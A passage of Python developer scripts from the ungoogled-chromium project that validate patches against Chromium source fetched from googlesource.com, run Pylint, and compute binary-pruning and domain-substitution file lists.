cleanly against the source tree. The required source tree files can be retrieved from Google directly. """ import argparse import ast import base64 import email.utils import json import logging import sys import tempfile from pathlib import Path sys.path.insert(0, str(Path(__file__).resolve().parent / 'third_party')) import unidiff from unidiff.constants import LINE_TYPE_EMPTY, LINE_TYPE_NO_NEWLINE sys.path.pop(0) sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from domain_substitution import TREE_ENCODINGS from _common import ENCODING, get_logger, get_chromium_version, parse_series, add_common_params from patches import dry_run_check sys.path.pop(0) try: import requests import requests.adapters import urllib3.util class _VerboseRetry(urllib3.util.Retry): """A more verbose version of HTTP Adatper about retries""" def sleep_for_retry(self, response=None): """Sleeps for Retry-After, and logs the sleep time""" if response: retry_after = self.get_retry_after(response) if retry_after: get_logger().info( 'Got HTTP status %s with Retry-After header. Retrying after %s seconds...', response.status, retry_after) else: get_logger().info( 'Could not find Retry-After header for HTTP response %s. Status reason: %s', response.status, response.reason) return super().sleep_for_retry(response) def _sleep_backoff(self): """Log info about backoff sleep""" get_logger().info('Running HTTP request sleep backoff') super()._sleep_backoff() def _get_requests_session(): session = requests.Session() http_adapter = requests.adapters.HTTPAdapter( max_retries=_VerboseRetry(total=10, read=10, connect=10, backoff_factor=8, status_forcelist=urllib3.Retry.RETRY_AFTER_STATUS_CODES, raise_on_status=False)) session.mount('http://', http_adapter) session.mount('https://', http_adapter) return session except ImportError: def _get_requests_session(): raise RuntimeError('The Python module "requests" is required for remote' 'file downloading. It can be installed from PyPI.') _ROOT_DIR = Path(__file__).resolve().parent.parent _SRC_PATH = Path('src') class _PatchValidationError(Exception): """Raised when patch validation fails""" class _UnexpectedSyntaxError(RuntimeError): """Raised when unexpected syntax is used in DEPS""" class _NotInRepoError(RuntimeError): """Raised when the remote file is not present in the given repo""" class _DepsNodeVisitor(ast.NodeVisitor): _valid_syntax_types = (ast.mod, ast.expr_context, ast.boolop, ast.Assign, ast.Add, ast.Name, ast.Dict, ast.Str, ast.NameConstant, ast.List, ast.BinOp) _allowed_callables = ('Var', ) def visit_Call(self, node): #pylint: disable=invalid-name """Override Call syntax handling""" if node.func.id not in self._allowed_callables: raise _UnexpectedSyntaxError('Unexpected call of "%s" at line %s, column %s' % (node.func.id, node.lineno, node.col_offset)) def generic_visit(self, node): for ast_type in self._valid_syntax_types: if isinstance(node, ast_type): super().generic_visit(node) return raise _UnexpectedSyntaxError('Unexpected {} at line {}, column {}'.format( type(node).__name__, node.lineno, node.col_offset)) def _validate_deps(deps_text): """Returns True if the DEPS file passes validation; False otherwise""" try: _DepsNodeVisitor().visit(ast.parse(deps_text)) except _UnexpectedSyntaxError as exc: get_logger().error('%s', exc) return False return True def _deps_var(deps_globals): """Return a function that implements DEPS's Var() function""" def _var_impl(var_name): """Implementation of Var() in DEPS""" return deps_globals['vars'][var_name] return _var_impl def _parse_deps(deps_text): """Returns a dict of parsed DEPS data""" deps_globals = {'__builtins__': None} deps_globals['Var'] = _deps_var(deps_globals) exec(deps_text, deps_globals) #pylint: disable=exec-used return deps_globals def _download_googlesource_file(download_session, repo_url, version, relative_path): """ Returns the contents of the text file with path within the given googlesource.com repo as a string. """ if 'googlesource.com' not in repo_url: raise ValueError('Repository URL is not a googlesource.com URL: {}'.format(repo_url)) full_url = repo_url + '/+/{}/{}?format=TEXT'.format(version, str(relative_path)) get_logger().debug('Downloading: %s', full_url) response = download_session.get(full_url) if response.status_code == 404: raise _NotInRepoError() response.raise_for_status() # Assume all files that need patching are compatible with UTF-8 return base64.b64decode(response.text, validate=True).decode('UTF-8') def _get_dep_value_url(deps_globals, dep_value): """Helper for _process_deps_entries""" if isinstance(dep_value, str): url = dep_value elif isinstance(dep_value, dict): if 'url' not in dep_value: # Ignore other types like CIPD since # it probably isn't necessary return None url = dep_value['url'] else: raise NotImplementedError() if '{' in url: # Probably a Python format string url = url.format(**deps_globals['vars']) if url.count('@') != 1: raise _PatchValidationError('Invalid number of @ symbols in URL: {}'.format(url)) return url def _process_deps_entries(deps_globals, child_deps_tree, child_path, deps_use_relative_paths): """Helper for _get_child_deps_tree""" for dep_path_str, dep_value in deps_globals.get('deps', dict()).items(): url = _get_dep_value_url(deps_globals, dep_value) if url is None: continue dep_path = Path(dep_path_str) if not deps_use_relative_paths: try: dep_path = Path(dep_path_str).relative_to(child_path) except ValueError: # Not applicable to the current DEPS tree path continue grandchild_deps_tree = None # Delaying creation of dict() until it's needed for recursedeps_item in deps_globals.get('recursedeps', tuple()): if isinstance(recursedeps_item, str): if recursedeps_item == str(dep_path): grandchild_deps_tree = 'DEPS' else: # Some sort of iterable recursedeps_item_path, recursedeps_item_depsfile = recursedeps_item if recursedeps_item_path == str(dep_path): grandchild_deps_tree = recursedeps_item_depsfile if grandchild_deps_tree is None: # This dep is not recursive; i.e. it is fully loaded grandchild_deps_tree = dict() child_deps_tree[dep_path] = (*url.split('@'), grandchild_deps_tree) def _get_child_deps_tree(download_session, current_deps_tree, child_path, deps_use_relative_paths): """Helper for _download_source_file""" repo_url, version, child_deps_tree = current_deps_tree[child_path] if isinstance(child_deps_tree, str): # Load unloaded DEPS deps_globals = _parse_deps( _download_googlesource_file(download_session, repo_url, version, child_deps_tree)) child_deps_tree = dict() current_deps_tree[child_path] = (repo_url, version, child_deps_tree) deps_use_relative_paths = deps_globals.get('use_relative_paths', False) _process_deps_entries(deps_globals, child_deps_tree, child_path, deps_use_relative_paths) return child_deps_tree, deps_use_relative_paths def _get_last_chromium_modification(): """Returns the last modification date of the chromium-browser-official tar file""" with _get_requests_session() as session: response = session.head( 'https://storage.googleapis.com/chromium-browser-official/chromium-{}.tar.xz'.format( get_chromium_version())) response.raise_for_status() return email.utils.parsedate_to_datetime(response.headers['Last-Modified']) def _get_gitiles_git_log_date(log_entry): """Helper for _get_gitiles_git_log_date""" return email.utils.parsedate_to_datetime(log_entry['committer']['time']) def _get_gitiles_commit_before_date(repo_url, target_branch, target_datetime): """Returns the hexadecimal hash of the closest commit before target_datetime""" json_log_url = '{repo}/+log/{branch}?format=JSON'.format(repo=repo_url, branch=target_branch) with _get_requests_session() as session: response = session.get(json_log_url) response.raise_for_status() git_log = json.loads(response.text[5:]) # Trim closing delimiters for various structures assert len(git_log) == 2 # 'log' and 'next' entries assert 'log' in git_log assert git_log['log'] git_log = git_log['log'] # Check boundary conditions if _get_gitiles_git_log_date(git_log[0]) < target_datetime: # Newest commit is older than target datetime return git_log[0]['commit'] if _get_gitiles_git_log_date(git_log[-1]) > target_datetime: # Oldest commit is newer than the target datetime; assume oldest is close enough. get_logger().warning('Oldest entry in gitiles log for repo "%s" is newer than target; ' 'continuing with oldest entry...') return git_log[-1]['commit'] # Do binary search low_index = 0 high_index = len(git_log) - 1 mid_index = high_index while low_index != high_index: mid_index = low_index + (high_index - low_index) // 2 if _get_gitiles_git_log_date(git_log[mid_index]) > target_datetime: low_index = mid_index + 1 else: high_index = mid_index return git_log[mid_index]['commit'] class _FallbackRepoManager: """Retrieves fallback repos and caches data needed for determining repos""" _GN_REPO_URL = 'https://gn.googlesource.com/gn.git' def __init__(self): self._cache_gn_version = None @property def gn_version(self): """ Returns the version of the GN repo for the Chromium version used by this code """ if not self._cache_gn_version: # Because there seems to be no reference to the logic for generating the # chromium-browser-official tar file, it's possible that it is being generated # by an internal script that manually injects the GN repository files. # Therefore, assume that the GN version used in the chromium-browser-official tar # files correspond to the latest commit in the master branch of the GN repository # at the time of the tar file's generation. We can get an approximation for the # generation time by using the last modification date of the tar file on # Google's file server. self._cache_gn_version = _get_gitiles_commit_before_date( self._GN_REPO_URL, 'master', _get_last_chromium_modification()) return self._cache_gn_version def get_fallback(self, current_relative_path, current_node, root_deps_tree): """ Helper for _download_source_file It returns a new (repo_url, version, new_relative_path) to attempt a file download with """ assert len(current_node) == 3 # GN special processing try: new_relative_path = current_relative_path.relative_to('tools/gn') except ValueError: pass else: if current_node is root_deps_tree[_SRC_PATH]: get_logger().info('Redirecting to GN repo version %s for path: %s', self.gn_version, current_relative_path) return (self._GN_REPO_URL, self.gn_version, new_relative_path) return None, None, None def _get_target_file_deps_node(download_session, root_deps_tree, target_file): """ Helper for _download_source_file Returns the corresponding repo containing target_file based on the DEPS tree """ # The "deps" from the current DEPS file current_deps_tree = root_deps_tree current_node = None # Path relative to the current node (i.e. DEPS file) current_relative_path = Path('src', target_file) previous_relative_path = None deps_use_relative_paths = False child_path = None while current_relative_path != previous_relative_path: previous_relative_path = current_relative_path for child_path in current_deps_tree: try: current_relative_path = previous_relative_path.relative_to(child_path) except ValueError: # previous_relative_path does not start with child_path continue current_node = current_deps_tree[child_path] # current_node will match with current_deps_tree after the following statement current_deps_tree, deps_use_relative_paths = _get_child_deps_tree( download_session, current_deps_tree, child_path, deps_use_relative_paths) break assert not current_node is None return current_node, current_relative_path def _download_source_file(download_session, root_deps_tree, fallback_repo_manager, target_file): """ Downloads the source tree file from googlesource.com download_session is an active requests.Session() object deps_dir is a pathlib.Path to the directory containing a DEPS file. """ current_node, current_relative_path = _get_target_file_deps_node(download_session, root_deps_tree, target_file) # Attempt download with potential fallback logic repo_url, version, _ = current_node try: # Download with DEPS-provided repo return _download_googlesource_file(download_session, repo_url, version, current_relative_path) except _NotInRepoError: pass get_logger().debug( 'Path "%s" (relative: "%s") not found using DEPS tree; finding fallback repo...', target_file, current_relative_path) repo_url, version, current_relative_path = fallback_repo_manager.get_fallback( current_relative_path, current_node, root_deps_tree) if not repo_url: get_logger().error('No fallback repo found for "%s" (relative: "%s")', target_file, current_relative_path) raise _NotInRepoError() try: # Download with fallback repo return _download_googlesource_file(download_session, repo_url, version, current_relative_path) except _NotInRepoError: pass get_logger().error('File "%s" (relative: "%s") not found in fallback repo "%s", version "%s"', target_file, current_relative_path, repo_url, version) raise _NotInRepoError() def _initialize_deps_tree(): """ Initializes and returns a dependency tree for DEPS files The DEPS tree is a dict has the following format: key - pathlib.Path relative to the DEPS file's path value - tuple(repo_url, version, recursive dict here) repo_url is the URL to the dependency's repository root If the recursive dict is a string, then it is a string to the DEPS file to load if needed download_session is an active requests.Session() object """ root_deps_tree = { _SRC_PATH: ('https://chromium.googlesource.com/chromium/src.git', get_chromium_version(), 'DEPS') } return root_deps_tree def _retrieve_remote_files(file_iter): """ Retrieves all file paths in file_iter from Google file_iter is an iterable of strings that are relative UNIX paths to files in the Chromium source. Returns a dict of relative UNIX path strings to a list of lines in the file as strings """ files = dict() root_deps_tree = _initialize_deps_tree() try: total_files = len(file_iter) except TypeError: total_files = None logger = get_logger() if total_files is None: logger.info('Downloading remote files...') else: logger.info('Downloading %d remote files...', total_files) last_progress = 0 file_count = 0 fallback_repo_manager = _FallbackRepoManager() with _get_requests_session() as download_session: download_session.stream = False # To ensure connection to Google can be reused for file_path in file_iter: if total_files: file_count += 1 current_progress = file_count * 100 // total_files // 5 * 5 if current_progress != last_progress: last_progress = current_progress logger.info('%d%% downloaded', current_progress) else: current_progress = file_count // 20 * 20 if current_progress != last_progress: last_progress = current_progress logger.info('%d files downloaded', current_progress) try: files[file_path] = _download_source_file(download_session, root_deps_tree, fallback_repo_manager, file_path).split('\n') except _NotInRepoError: get_logger().warning('Could not find "%s" remotely. Skipping...', file_path) return files def _retrieve_local_files(file_iter, source_dir): """ Retrieves all file paths in file_iter from the local source tree file_iter is an iterable of strings that are relative UNIX paths to files in the Chromium source. Returns a dict of relative UNIX path strings to a list of lines in the file as strings """ files = dict() for file_path in file_iter: try: raw_content = (source_dir / file_path).read_bytes() except FileNotFoundError: get_logger().warning('Missing file from patches: %s', file_path) continue for encoding in TREE_ENCODINGS: try: content = raw_content.decode(encoding) break except UnicodeDecodeError: continue if not content: raise UnicodeDecodeError('Unable to decode with any encoding: %s' % file_path) files[file_path] = content.split('\n') if not files: get_logger().error('All files used by patches are missing!') return files def _modify_file_lines(patched_file, file_lines): """Helper for _apply_file_unidiff""" # Cursor for keeping track of the current line during hunk application # NOTE: The cursor is based on the line list index, not the line number! line_cursor = None for hunk in patched_file: # Validate hunk will match if not hunk.is_valid(): raise _PatchValidationError('Hunk is not valid: {}'.format(repr(hunk))) line_cursor = hunk.target_start - 1 for line in hunk: normalized_line = line.value.rstrip('\n') if line.is_added: file_lines[line_cursor:line_cursor] = (normalized_line, ) line_cursor += 1 elif line.is_removed: if normalized_line != file_lines[line_cursor]: raise _PatchValidationError( "Line '{}' does not match removal line '{}' from patch".format( file_lines[line_cursor], normalized_line)) del file_lines[line_cursor] elif line.is_context: if not normalized_line and line_cursor == len(file_lines): # We reached the end of the file break if normalized_line != file_lines[line_cursor]: raise _PatchValidationError( "Line '{}' does not match context line '{}' from patch".format( file_lines[line_cursor], normalized_line)) line_cursor += 1 else: assert line.line_type in (LINE_TYPE_EMPTY, LINE_TYPE_NO_NEWLINE) def _apply_file_unidiff(patched_file, files_under_test): """Applies the unidiff.PatchedFile to the source files under testing""" patched_file_path = Path(patched_file.path) if patched_file.is_added_file: if patched_file_path in files_under_test: assert files_under_test[patched_file_path] is None assert len(patched_file) == 1 # Should be only one hunk assert patched_file[0].removed == 0 assert patched_file[0].target_start == 1 files_under_test[patched_file_path] = [x.value.rstrip('\n') for x in patched_file[0]] elif patched_file.is_removed_file: # Remove lines to see if file to be removed matches patch _modify_file_lines(patched_file, files_under_test[patched_file_path]) files_under_test[patched_file_path] = None else: # Patching an existing file assert patched_file.is_modified_file _modify_file_lines(patched_file, files_under_test[patched_file_path]) def _dry_check_patched_file(patched_file, orig_file_content): """Run "patch --dry-check" on a unidiff.PatchedFile for diagnostics""" with tempfile.TemporaryDirectory() as tmpdirname: tmp_dir = Path(tmpdirname) # Write file to patch patched_file_path = tmp_dir / patched_file.path patched_file_path.parent.mkdir(parents=True, exist_ok=True) patched_file_path.write_text(orig_file_content) # Write patch patch_path = tmp_dir / 'broken_file.patch' patch_path.write_text(str(patched_file)) # Dry run _, dry_stdout, _ = dry_run_check(patch_path, tmp_dir) return dry_stdout def _test_patches(series_iter, patch_cache, files_under_test): """ Tests the patches specified in the iterable series_iter Returns a boolean indicating if any of the patches have failed """ for patch_path_str in series_iter: for patched_file in patch_cache[patch_path_str]: orig_file_content = None if get_logger().isEnabledFor(logging.DEBUG): orig_file_content = files_under_test.get(Path(patched_file.path)) if orig_file_content: orig_file_content = ' '.join(orig_file_content) try: _apply_file_unidiff(patched_file, files_under_test) except _PatchValidationError as exc: get_logger().warning('Patch failed validation: %s', patch_path_str) get_logger().debug('Specifically, file "%s" failed validation: %s', patched_file.path, exc) if get_logger().isEnabledFor(logging.DEBUG): # _PatchValidationError cannot be thrown when a file is added assert patched_file.is_modified_file or patched_file.is_removed_file assert orig_file_content is not None get_logger().debug( 'Output of "patch --dry-run" for this patch on this file:\n%s', _dry_check_patched_file(patched_file, orig_file_content)) return True except: #pylint: disable=bare-except get_logger().warning('Patch failed validation: %s', patch_path_str) get_logger().debug('Specifically, file "%s" caused exception while applying:', patched_file.path, exc_info=True) return True return False def _load_all_patches(series_iter, patches_dir): """ Returns a tuple of the following: - boolean indicating success or failure of reading files - dict of relative UNIX path strings to unidiff.PatchSet """ had_failure = False unidiff_dict = dict() for relative_path in series_iter: if relative_path in unidiff_dict: continue unidiff_dict[relative_path] = unidiff.PatchSet.from_filename(str(patches_dir / relative_path), encoding=ENCODING) if not (patches_dir / relative_path).read_text(encoding=ENCODING).endswith('\n'): had_failure = True get_logger().warning('Patch file does not end with newline: %s', str(patches_dir / relative_path)) return had_failure, unidiff_dict def _get_required_files(patch_cache): """Returns an iterable of pathlib.Path files needed from the source tree for patching""" new_files = set() # Files introduced by patches file_set = set() for patch_set in patch_cache.values(): for patched_file in patch_set: if patched_file.is_added_file: new_files.add(patched_file.path) elif patched_file.path not in new_files: file_set.add(Path(patched_file.path)) return file_set def _get_files_under_test(args, required_files, parser): """ Helper for main to get files_under_test Exits the program if --cache-remote debugging option is used """ if args.local: files_under_test = _retrieve_local_files(required_files, args.local) else: # --remote and --cache-remote files_under_test = _retrieve_remote_files(required_files) if args.cache_remote: for file_path, file_content in files_under_test.items(): if not (args.cache_remote / file_path).parent.exists(): (args.cache_remote / file_path).parent.mkdir(parents=True) with (args.cache_remote / file_path).open('w', encoding=ENCODING) as cache_file: cache_file.write('\n'.join(file_content)) parser.exit() return files_under_test def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('-s', '--series', type=Path, metavar='FILE', default=str(Path('patches', 'series')), help='The series file listing patches to apply. Default: %(default)s') parser.add_argument('-p', '--patches', type=Path, metavar='DIRECTORY', default='patches', help='The patches directory to read from. Default: %(default)s') add_common_params(parser) file_source_group = parser.add_mutually_exclusive_group(required=True) file_source_group.add_argument( '-l', '--local', type=Path, metavar='DIRECTORY', help= 'Use a local source tree. It must be UNMODIFIED, otherwise the results will not be valid.') file_source_group.add_argument( '-r', '--remote', action='store_true', help=('Download the required source tree files from Google. ' 'This feature requires the Python module "requests". If you do not want to ' 'install this, consider using --local instead.')) file_source_group.add_argument( '-c', '--cache-remote', type=Path, metavar='DIRECTORY', help='(For debugging) Store the required remote files in an empty local directory') args = parser.parse_args() if args.cache_remote and not args.cache_remote.exists(): if args.cache_remote.parent.exists(): args.cache_remote.mkdir() else: parser.error('Parent of cache path {} does not exist'.format(args.cache_remote)) if not args.series.is_file(): parser.error('--series path is not a file or not found: {}'.format(args.series)) if not args.patches.is_dir(): parser.error('--patches path is not a directory or not found: {}'.format(args.patches)) series_iterable = tuple(parse_series(args.series)) had_failure, patch_cache = _load_all_patches(series_iterable, args.patches) required_files = _get_required_files(patch_cache) files_under_test = _get_files_under_test(args, required_files, parser) had_failure |= _test_patches(series_iterable, patch_cache, files_under_test) if had_failure: get_logger().error('***FAILED VALIDATION; SEE ABOVE***') if not args.verbose: get_logger().info('(For more error details, re-run with the "-v" flag)') parser.exit(status=1) else: get_logger().info('Passed validation (%d patches total)', len(series_iterable)) if __name__ == '__main__': main() File: devutils/run_other_pylint.py #!/usr/bin/env python3 # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Run Pylint over any module""" import argparse import os import shutil import sys from pathlib import Path from pylint import lint class ChangeDir: """ Changes directory to path in with statement """ def __init__(self, path): self._path = path self._orig_path = os.getcwd() def __enter__(self): os.chdir(str(self._path)) def __exit__(self, *_): os.chdir(self._orig_path) def run_pylint(module_path, pylint_options, ignore_prefixes=tuple()): """Runs Pylint. Returns a boolean indicating success""" pylint_stats = Path('/run/user/{}/pylint_stats'.format(os.getuid())) if not pylint_stats.parent.is_dir(): #pylint: disable=no-member pylint_stats = Path('/run/shm/pylint_stats') os.environ['PYLINTHOME'] = str(pylint_stats) input_paths = list() if not module_path.exists(): print('ERROR: Cannot find', module_path) sys.exit(1) if module_path.is_dir(): for path in module_path.rglob('*.py'): ignore_matched = False for prefix in ignore_prefixes: if path.parts[:len(prefix)] == prefix: ignore_matched = True break if ignore_matched: continue input_paths.append(str(path)) else: input_paths.append(str(module_path)) runner = lint.Run((*input_paths, *pylint_options), do_exit=False) if pylint_stats.is_dir(): shutil.rmtree(str(pylint_stats)) if runner.linter.msg_status != 0: print('WARNING: Non-zero exit status:', runner.linter.msg_status) return False return True def main(): """CLI entrypoint""" parser = argparse.ArgumentParser(description='Run Pylint over arbitrary module') parser.add_argument('--hide-fixme', action='store_true', help='Hide "fixme" Pylint warnings.') parser.add_argument('--show-locally-disabled', action='store_true', help='Show "locally-disabled" Pylint warnings.') parser.add_argument('module_path', type=Path, help='Path to the module to check') args = parser.parse_args() if not args.module_path.exists(): print('ERROR: Module path "{}" does not exist'.format(args.module_path)) sys.exit(1) disables = [ 'wrong-import-position', 'bad-continuation', ] if args.hide_fixme: disables.append('fixme') if not args.show_locally_disabled: disables.append('locally-disabled') pylint_options = [ '--disable={}'.format(','.join(disables)), '--jobs=4', '--score=n', '--persistent=n', ] if not run_pylint(args.module_path, pylint_options): sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/update_lists.py #!/usr/bin/env python3 # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Update binary pruning and domain substitution lists automatically. It will download and unpack into the source tree as necessary. No binary pruning or domain substitution will be applied to the source tree after the process has finished. """ import argparse import os import sys from itertools import repeat from multiprocessing import Pool from pathlib import Path, PurePosixPath sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from _common import get_logger from domain_substitution import DomainRegexList, TREE_ENCODINGS from prune_binaries import CONTINGENT_PATHS sys.path.pop(0) # Encoding for output files _ENCODING = 'UTF-8' # NOTE: Include patterns have precedence over exclude patterns # pathlib.Path.match() paths to include in binary pruning PRUNING_INCLUDE_PATTERNS = [ 'components/domain_reliability/baked_in_configs/*', # Removals for patches/core/ungoogled-chromium/remove-unused-preferences-fields.patch 'components/safe_browsing/core/common/safe_browsing_prefs.cc', 'components/safe_browsing/core/common/safe_browsing_prefs.h', 'components/signin/public/base/signin_pref_names.cc', 'components/signin/public/base/signin_pref_names.h', ] # pathlib.Path.match() paths to exclude from binary pruning PRUNING_EXCLUDE_PATTERNS = [ 'chrome/common/win/eventlog_messages.mc', # TODO: False positive textfile # Exclusions for DOM distiller (contains model data only) 'components/dom_distiller/core/data/distillable_page_model_new.bin', 'components/dom_distiller/core/data/long_page_model.bin', # Exclusions for GeoLanguage data # Details: https://docs.google.com/document/d/18WqVHz5F9vaUiE32E8Ge6QHmku2QSJKvlqB9JjnIM-g/edit # Introduced with: https://chromium.googlesource.com/chromium/src/+/6647da61 'components/language/content/browser/ulp_language_code_locator/geolanguage-data_rank0.bin', 'components/language/content/browser/ulp_language_code_locator/geolanguage-data_rank1.bin', 'components/language/content/browser/ulp_language_code_locator/geolanguage-data_rank2.bin', # Exclusion for required prebuilt object for Windows arm64 builds 'third_party/crashpad/crashpad/util/misc/capture_context_win_arm64.obj', 'third_party/icu/common/icudtl.dat', # Exclusion for ICU data # Exclusion for Android 'build/android/chromium-debug.keystore', 'third_party/icu/android/icudtl.dat', 'third_party/icu/common/icudtb.dat', # Exclusion for performance tracing 'third_party/perfetto/src/trace_processor/importers/proto/atoms.descriptor', # Exclusions for safe file extensions '*.avif', '*.ttf', '*.png', '*.jpg', '*.webp', '*.gif', '*.ico', '*.mp3', '*.wav', '*.flac', '*.icns', '*.woff', '*.woff2', '*makefile', '*.profdata', '*.xcf', '*.cur', '*.pdf', '*.ai', '*.h', '*.c', '*.cpp', '*.cc', '*.mk', '*.bmp', '*.py', '*.xml', '*.html', '*.js', '*.json', '*.txt', '*.xtb' ] # NOTE: Domain substitution path prefix exclusion has precedence over inclusion patterns # Paths to exclude by prefixes of the POSIX representation for domain substitution DOMAIN_EXCLUDE_PREFIXES = [ 'components/test/', 'net/http/transport_security_state_static.json', 'net/http/transport_security_state_static_pins.json', # Exclusions for Visual Studio Project generation with GN (PR #445) 'tools/gn/', # Exclusions for files covered with other patches/unnecessary 'components/search_engines/prepopulated_engines.json', 'third_party/blink/renderer/core/dom/document.cc', ] # pathlib.Path.match() patterns to include in domain substitution DOMAIN_INCLUDE_PATTERNS = [ '*.h', '*.hh', '*.hpp', '*.hxx', '*.cc', '*.cpp', '*.cxx', '*.c', '*.h', '*.json', '*.js', '*.html', '*.htm', '*.css', '*.py*', '*.grd*', '*.sql', '*.idl', '*.mk', '*.gyp*', 'makefile', '*.ts', '*.txt', '*.xml', '*.mm', '*.jinja*', '*.gn', '*.gni' ] # Binary-detection constant _TEXTCHARS = bytearray({7, 8, 9, 10, 12, 13, 27} | set(range(0x20, 0x100)) - {0x7f}) class UnusedPatterns: #pylint: disable=too-few-public-methods """Tracks unused prefixes and patterns""" _all_names = ('pruning_include_patterns', 'pruning_exclude_patterns', 'domain_include_patterns', 'domain_exclude_prefixes') def __init__(self): # Initialize all tracked patterns and prefixes in sets # Users will discard elements that are used for name in self._all_names: setattr(self, name, set(globals()[name.upper()])) def log_unused(self, error=True): """ Logs unused patterns and prefixes Returns True if there are unused patterns or prefixes; False otherwise """ have_unused = False log = get_logger().error if error else get_logger().info for name in self._all_names: current_set = getattr(self, name, None) if current_set: log('Unused from %s: %s', name.upper(), current_set) have_unused = True return have_unused def _is_binary(bytes_data): """ Returns True if the data seems to be binary data (i.e. not human readable); False otherwise """ # From: https://stackoverflow.com/a/7392391 return bool(bytes_data.translate(None, _TEXTCHARS)) def _dir_empty(path): """ Returns True if the directory is empty; False otherwise path is a pathlib.Path or string to a directory to test. """ try: next(os.scandir(str(path))) except StopIteration: return True return False def should_prune(path, relative_path, used_pep_set, used_pip_set): """ Returns True if a path should be pruned from the source tree; False otherwise path is the pathlib.Path to the file from the current working directory. relative_path is the pathlib.Path to the file from the source tree used_pep_set is a list of PRUNING_EXCLUDE_PATTERNS that have been matched used_pip_set is a list of PRUNING_INCLUDE_PATTERNS that have been matched """ # Match against include patterns for pattern in filter(relative_path.match, PRUNING_INCLUDE_PATTERNS): used_pip_set.add(pattern) return True # Match against exclude patterns for pattern in filter(Path(str(relative_path).lower()).match, PRUNING_EXCLUDE_PATTERNS): used_pep_set.add(pattern) return False # Do binary data detection with path.open('rb') as file_obj: if _is_binary(file_obj.read()): return True # Passed all filtering; do not prune return False def _check_regex_match(file_path, search_regex): """ Returns True if a regex pattern matches a file; False otherwise file_path is a pathlib.Path to the file to test search_regex is a compiled regex object to search for domain names """ with file_path.open("rb") as file_obj: file_bytes = file_obj.read() content = None for encoding in TREE_ENCODINGS: try: content = file_bytes.decode(encoding) break except UnicodeDecodeError: continue if not search_regex.search(content) is None: return True return False def should_domain_substitute(path, relative_path, search_regex, used_dep_set, used_dip_set): """ Returns True if a path should be domain substituted in the source tree; False otherwise path is the pathlib.Path to the file from the current working directory. relative_path is the pathlib.Path to the file from the source tree. used_dep_set is a list of DOMAIN_EXCLUDE_PREFIXES that have been matched used_dip_set is a list of DOMAIN_INCLUDE_PATTERNS that have been matched """ relative_path_posix = relative_path.as_posix().lower() for include_pattern in DOMAIN_INCLUDE_PATTERNS: if PurePosixPath(relative_path_posix).match(include_pattern): used_dip_set.add(include_pattern) for exclude_prefix in DOMAIN_EXCLUDE_PREFIXES: if relative_path_posix.startswith(exclude_prefix): used_dep_set.add(exclude_prefix) return False return _check_regex_match(path, search_regex) return False def compute_lists_proc(path, source_tree, search_regex): """ Adds the path to appropriate lists to be used by compute_lists. path is the pathlib.Path to the file from the current working directory. source_tree is a pathlib.Path to the source tree search_regex is a compiled regex object to search for domain names """ used_pep_set = set() # PRUNING_EXCLUDE_PATTERNS used_pip_set = set() # PRUNING_INCLUDE_PATTERNS used_dep_set = set() # DOMAIN_EXCLUDE_PREFIXES used_dip_set = set() # DOMAIN_INCLUDE_PATTERNS pruning_set = set() domain_substitution_set = set() symlink_set = set() if path.is_file(): relative_path = path.relative_to(source_tree) if not any(cpath in str(relative_path.as_posix()) for cpath in CONTINGENT_PATHS): if path.is_symlink(): try: resolved_relative_posix = path.resolve().relative_to(source_tree).as_posix() symlink_set.add((resolved_relative_posix, relative_path.as_posix())) except ValueError: # Symlink leads out of the source tree pass elif not any(skip in ('.git', '__pycache__', 'uc_staging') for skip in path.parts): try: if should_prune(path, relative_path, used_pep_set, used_pip_set): pruning_set.add(relative_path.as_posix()) elif should_domain_substitute(path, relative_path, search_regex, used_dep_set, used_dip_set): domain_substitution_set.add(relative_path.as_posix()) except: #pylint: disable=bare-except get_logger().exception('Unhandled exception while processing %s', relative_path) return (used_pep_set, used_pip_set, used_dep_set, used_dip_set, pruning_set, domain_substitution_set, symlink_set) def compute_lists(source_tree, search_regex, processes): # pylint: disable=too-many-locals """ Compute the binary pruning and domain substitution lists of the source tree. Returns a tuple of three items in the following order: 1. The sorted binary pruning list 2. The sorted domain substitution list 3. An UnusedPatterns object source_tree is a pathlib.Path to the source tree search_regex is a compiled regex object to search for domain names processes is the maximum number of worker processes to create """ pruning_set = set() domain_substitution_set = set() symlink_set = set() # POSIX resolved path -> set of POSIX symlink paths source_tree = source_tree.resolve() unused_patterns = UnusedPatterns() # Launch multiple processes iterating over the source tree with Pool(processes) as procpool: returned_data = procpool.starmap( compute_lists_proc, zip(source_tree.rglob('*'), repeat(source_tree), repeat(search_regex))) # Handle the returned data for (used_pep_set, used_pip_set, used_dep_set, used_dip_set, returned_pruning_set, returned_domain_sub_set, returned_symlink_set) in returned_data: # pragma pylint: disable=no-member unused_patterns.pruning_exclude_patterns.difference_update(used_pep_set) unused_patterns.pruning_include_patterns.difference_update(used_pip_set) unused_patterns.domain_exclude_prefixes.difference_update(used_dep_set) unused_patterns.domain_include_patterns.difference_update(used_dip_set) # pragma pylint: enable=no-member pruning_set.update(returned_pruning_set) domain_substitution_set.update(returned_domain_sub_set) symlink_set.update(returned_symlink_set) # Prune symlinks for pruned files for (resolved, symlink) in symlink_set: if resolved in pruning_set: pruning_set.add(symlink) return sorted(pruning_set), sorted(domain_substitution_set), unused_patterns def main(args_list=None): """CLI entrypoint""" parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('--pruning', metavar='PATH', type=Path, default='pruning.list', help='The path to store pruning.list. Default: %(default)s') parser.add_argument('--domain-substitution', metavar='PATH', type=Path, default='domain_substitution.list', help='The path to store domain_substitution.list. Default: %(default)s') parser.add_argument('--domain-regex', metavar='PATH', type=Path, default='domain_regex.list', help='The path to domain_regex.list. Default: %(default)s') parser.add_argument('-t', '--tree', metavar='PATH', type=Path, required=True, help='The path to the source tree to use.') parser.add_argument( '--processes', metavar='NUM', type=int, default=None, help= 'The maximum number of worker processes to create. Defaults to the number of system CPUs.') parser.add_argument('--domain-exclude-prefix', metavar='PREFIX', type=str, action='append', help='Additional exclusion for domain_substitution.list.') parser.add_argument('--no-error-unused', 